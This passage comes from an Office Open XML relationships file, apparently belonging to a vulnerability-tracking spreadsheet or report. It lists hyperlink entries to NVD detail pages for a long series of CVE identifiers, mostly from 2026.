Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88048" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88049" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88051" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88053" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88056" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88060" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88863" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88865" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88895" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88937" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11813" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12858" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16233" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16234" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17107" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23929" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45221" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45414" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4644" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48113" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54606" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55108" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55526" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57485" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61639" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61640" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62246" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63425" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63427" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64195" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64196" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64197" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64198" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64200" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64851" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65986" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67397" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67609" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68558" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69250" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6958" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73072" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73079" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73233" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73248" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73410" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75142" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75486" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75616" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75858" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75911" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75913" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77974" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80112" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80114" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80116" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80119" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80378" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80436" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81207" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81302" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81540" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82474" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84063" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84226" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85012" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85439" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85656" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85674" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86095" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86492" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86540" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86754" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87023" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87030" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88886" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88889" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89049" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9853" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9854" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-12737" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0008" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0010" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18994" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19136" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19843" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20501" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20502" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21085" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21101" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4130" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42805" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44901" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47211" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47764" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47781" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52491" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52875" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53091" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54369" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54371" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55581" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55582" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57159" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57432" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63388" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64657" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66065" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67986" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72734" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73076" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73077" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73629" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75060" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75855" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76228" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76229" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76230" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76231" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76232" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76233" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76838" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76878" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77118" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80118" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82563" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85613" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85616" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85651" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86502" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86741" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86751" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87811" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87813" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87814" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87815" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88022" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88890" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28808" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29988" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38820" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45730" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48105" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48106" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49224" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49225" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49226" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52769" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52771" TargetMode="External" Id="rId1654" /><Relationship 